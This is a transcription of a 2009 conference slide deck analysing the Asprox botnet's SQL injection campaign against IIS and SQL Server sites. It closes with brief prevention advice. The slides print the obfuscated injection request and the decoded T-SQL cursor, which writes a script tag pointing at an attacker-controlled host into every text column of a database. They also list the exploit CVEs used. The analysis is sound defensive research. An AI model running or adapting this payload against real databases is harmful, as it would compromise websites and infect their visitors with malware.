Botnet-Powered SQL Injection Attacks A Deeper Look Within (VB, Sep. 2009) David Maciejak Guillaume Lovet



Similar documents
Understanding Web Application Security Issues

SQL Injection. Slides thanks to Prof. Shmatikov at UT Austin

CIS 433/533 - Computer and Network Security. Web Vulnerabilities, Wrapup

To Cache a Thief Using database caches to detect SQL injection attacks. Kevvie Fowler, CISSP, GCFA Gold, MCTS, MCDBA, MCSD, MCSE

Introduction to Web Application Firewalls. Dustin Anders

Evil Though the Lens of Web Logs

[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

Black Hat Briefings USA 2004 Cameron Hotchkies

RIA SECURITY TECHNOLOGY

Shellshock. Oz Elisyan & Maxim Zavodchik

SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd

SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever. Dana Tamir, Product Marketing Manager, Imperva

Webapps Vulnerability Report

Manipulating Microsoft SQL Server Using SQL Injection

Using SQL Server Management Studio

Cross Site Scripting in Joomla Acajoom Component

Automating SQL Injection Exploits

SECURING APACHE : THE BASICS - III

SQL INJECTION ATTACKS

Securing and Accelerating Databases In Minutes using GreenSQL

Preparing for the Cross Site Request Forgery Defense

Web-Application Security

INTRUSION PROTECTION AGAINST SQL INJECTION ATTACKS USING REVERSE PROXY

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

Beyond Aurora s Veil: A Vulnerable Tale

The Dark Side of Trusting Web Searches From Blackhat SEO to System Infection

CTF Web Security Training. Engin Kirda

Networks and Security Lab. Network Forensics

CS 558 Internet Systems and Technologies

Magento Security and Vulnerabilities. Roman Stepanov

SQL Database Administration. Overview

ArcGIS Server Security Threats & Best Practices David Cordes Michael Young

How I hacked PacketStorm ( )

Overview of SQL Injection

Bypassing Internet Explorer s XSS Filter

Dan Hubbard VP Security Research

Microsoft SQL Server Scheduling

Module 1: Getting Started with Databases and Transact-SQL in SQL Server 2008

Indian Computer Emergency Response Team (CERT-In) Annual Report (2010)

Writing Queries Using Microsoft SQL Server 2008 Transact-SQL

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Malicious Network Traffic Analysis

Implementation of Web Application Firewall

DIPLOMA IN WEBDEVELOPMENT

USING FILERELICATIONPRO TO REPLICATE SQL SERVER

Security Awareness For Website Administrators. State of Illinois Central Management Services Security and Compliance Solutions

Web Application Worms & Browser Insecurity

Analysis of the Australian Web Threat Landscape Christopher Ke, Jonathan Oliver and Yang Xiang

Best Practices in SQL Programming. Madhivanan

Advancements in Botnet Attacks and Malware Distribution

Writing Queries Using Microsoft SQL Server 2008 Transact-SQL

Client vs. Server Implementations of Mitigating XSS Security Threats on Web Applications

How to schedule and automate backups of SQL Server databases in SQL Server Express Editions

Attacks on Clients: Dynamic Content & XSS

Check list for web developers

Cross-Site Scripting

Vulnerability-Focused Threat Detection: Protect Against the Unknown

Exploring the Black Hole Exploit Kit

The SQL Injection and Signature Evasion

Intrusion detection for web applications

White Paper. SQL Injection 2.0. Protecting Web Sites from Automated and Advanced SQL Injection

Spam and All Things Salty: Spambot v2013

WEB ATTACKS AND COUNTERMEASURES

Advanced PostgreSQL SQL Injection and Filter Bypass Techniques

Detection of SQL Injection and XSS Vulnerability in Web Application

Threat Intelligence UPDATE: Cymru EIS Report. cymru.com

What do a banking Trojan, Chrome and a government mail server have in common? Analysis of a piece of Brazilian malware

Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

white paper Malware Security and the Bottom Line

What? Me, Worry? I've Already Been Hacked. Haven't You?

Attack and Penetration Testing 101

Complete Cross-site Scripting Walkthrough

What is Web Security? Motivation

Cross-Site-Scripting (XSS)

Botnets Die Hard Owned and Operated

Operation Liberpy : Keyloggers and information theft in Latin America

How To Fix A Web Application Security Vulnerability

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

Description: Course Details:

Web Application Guidelines

Blackhole Exploit Kit: A Spam Campaign, Not a Series of Individual Spam Runs AN IN-DEPTH ANALYSIS

Advanced Queries and Linked Servers

MCAFEE FOUNDSTONE FSL UPDATE

Rise of the Machines: An Internet-Wide Analysis of Web Bots in 2014

HTTPParameter Pollution. ChrysostomosDaniel

Data Breaches and Web Servers: The Giant Sucking Sound

SQL Server An Overview

Streamlining Web and Security

Performance Implications of Various Cursor Types in Microsoft SQL Server. By: Edward Whalen Performance Tuning Corporation

Be Prepared for Java Zero-day Attacks

Where every interaction matters.

Single Sign-On for the Internet: A Security Story. Eugene Tsyrklevich eugene@tsyrklevich.name Vlad Tsyrklevich vlad902@gmail.com

Hack Proof Your Webapps

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

Introduction to Computer Security

SQL Injection. By Artem Kazanstev, ITSO and Alex Beutel, Student

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Malware B-Z: Inside the Threat From Blackhole to ZeroAccess

Transcription:

Botnet-Powered SQL Injection Attacks A Deeper Look Within (VB, Sep. 2009) David Maciejak Guillaume Lovet

Agenda 1 2 3 The Beginning Attack Analysis Malicious Injected JS 4 Threat Evolution 5 Prevention 2

The Beginning May 2008: new Asprox Botnet variant *using Google dorks to find SQL servers *using HTTP Get bruteforce for SQL injection => millions reported attempts => many successful compromised targets 3

Agenda 1 2 3 The Beginning Attack Analysis Malicious Injected JS 4 Threat Evolution 5 Prevention 4

Attack Analysis First attack reported to us: GET /page.asp?id=425;declare%20@s %20NVARCHAR(4000);SET%20 @S=CAST(0x4400450043004C004100520045002000400054...0065005F0043007500720073006F007200%20AS %20NVARCHAR(4000));EXEC(@S);-- *GET requests can be found in web server logs *seems obfuscated SQL injection is appended to variable 'id' value 5

Attack Analysis Clean up: DECLARE @S NVARCHAR(4000); SET @S=CAST(0x440045004300... AS NVARCHAR(4000)); EXEC(@S) @S String variable is executed (EXEC function) *CAST function is used to obfuscate chars, converts hexadecimal chars to ASCII value 6

Attack Analysis How to decode 0x4400450043004C00410052004500...? *easy: NULL chars added between each chars Hexa to ascii gives: 0x44 = D 0x45 = E 0x43 = C 0x4C = L... 7

Using Perl Kung-Fu gives the whole code DECLARE @T varchar(255),@c varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype= u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @ T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec( update [ +@T+ ] set [ +@C+ ]=rtrim(convert(va rchar,[ +@C+ ]))+ <script src=http://www.directxx. com/7.js></script> )FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor 8 DEALLOCATE Table_Cursor

Attack Analysis Facts: *Asprox variant is searching for ASP pages => targeting Microsoft IIS *the code is written in Transact-SQL => targeting Microsoft SQL Server 9

Attack Analysis What does this statement do? select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype= u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) It queries system tables named 'sysobjects' and 'syscolumns' 10

Attack Analysis sysobjects xtype= u =>filter data type object for User table syscolumns xtype=99 or xtype=35 or xtype=231 or xtype=167 =>filter physical storage type for 35 (text), 99 (ntext), 167 (varchar), 231 (nvarchar) = Statement returns all user tables and columns of type type. 11

DECLARE @T varchar(255),@c varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype= u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @ T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec( update [ +@T+ ] set [ +@C+ ]=rtrim(convert(va rchar,[ +@C+ ]))+ <script src=http://www.directxx. com/7.js></script> )FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor 12

DECLARE @T varchar(255),@c varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype= u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @ T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec( update [ +@T+ ] set [ +@C+ ]=rtrim(convert(va rchar,[ +@C+ ]))+ <script src=hxxp://www.directxx. com/7.js></script> )FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor 13

Attack Analysis exec( update [ +@T+ ] set [ +@ C+ ]= rtrim(convert(varchar,[ +@ C+ ])) + execute statement string concatenation update statement String conversion <script src=hxxp://www.directxx.com/7.js></script> ) malicious HTML snippet 14

Agenda 1 2 3 The Beginning Attack Analysis Malicious Injected JS 4 Threat Evolution 5 Prevention 15

Malicious Injected JS Redirects to all-in-one web exploit toolkit > 10 attacks ActiveX, Flash, Quicktime, no PDF at that time MS06-014, CVE-2007-0071, CVE-2008-3704, CVE-2008-2463, BID:29118, CVE-2008-130, CVE-2007-5601, CVE-2007-4816, CVE-2006-5820 CVE-2007-616, CVE-2007-5017, MS08-078 Purpose: *download and execute malicious files on the victim's system 16

Agenda 1 2 3 4 The Beginning Attack Analysis Malicious Injected JS Threat Evolution 5 Prevention 17

Threat Evolution * use of search engine to find victims * more attacks, speed up in exploitation campaign * not new, similar SQL injection trick was used in 2007 but not widely distributed *T-SQL script evolving: version using iframe tag or conditional infection 18

Threat Evolution * use of search engine to find victims * more attacks, speed up in exploitation campaign * not new, similar SQL injection trick was used in 2007 but not widely distributed *T-SQL script evolving: version using iframe tag or conditional infection 19

Prevention * web code analyzing, sanitize user input * use IPS to filter incoming HTTP requests containing SQL patterns or web application firewall to force filtering 20

21 Thanks

2024 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information